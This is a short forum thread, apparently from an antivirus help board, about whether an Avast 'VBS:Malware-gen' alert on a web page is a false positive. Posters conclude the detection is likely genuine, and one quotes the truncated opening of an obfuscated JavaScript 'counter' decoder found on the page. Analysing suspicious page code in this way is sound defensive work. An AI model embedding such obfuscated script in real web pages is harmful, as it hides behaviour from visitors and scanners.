Believed False Positive: Malware-Gen

My Avast On-Access reports “VBS:Malware-gen” as detected on the following web page:

(Change the obvious at the beginning; I didn’t want a working link just in case the page really does house an infection!))

AVG does not report any issues with the site; nor does Trend OfficeScan. I therefore suspect it to be a false positive by Avast.

Avast version 4.8 Home Edition
Builld: Jul2008(4.8.1229)
VPS Version: 080925-0, 25/09/2008


Bad for them… the site is infected…

It does look like a good detection, see

I had a quick look at the code on the page and I think that this might be what is having avast and the other AVs getting anxious about. And the code in after the “document.write” bit in particular I believe this might just be for a page counter but it does a lot to hide what it is doing.

<!-- start counter :rkgi58s:wpnjs --><script language=JavaScript>function 
dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,43,20,57,12,11,8,46,29,16,0,0,0,0,0,0,27,62,

David, thanks for putting in the time to look at this query :wink:

So, your analysis is that the page does not actually contain a virus or malware?

Some page counters are not just page counters.

Install a HOSTS file to prevent page counters from counting.

HOSTS files I use:

Managed with HostsMan and I use its HostsServer proxy to speed up browsing:

You’re welcome.

No, what I’m saying is really why is it going to the trouble of obfuscating the code, it is this which might be why avast and 8 other scanners are alerting on it (including GData with avast as it also uses avast as one of its scanners to make 9 detections in total).

It needs further analysis by avast (I have sent a sample) as it is beyond my limited knowledge, being able to suspect why it might be detected is less than knowing exactly what the code is doing.

So I would air on the side of safety (along with the multiple detections) and wouldn’t visit that site.

@ YoKenny
I don’t know if a hosts file would prevent this type of obfuscated code (assuming it is indeed a page hit counter) as it wouldn’t have a clearly defined domain name to work with.

I would post the same…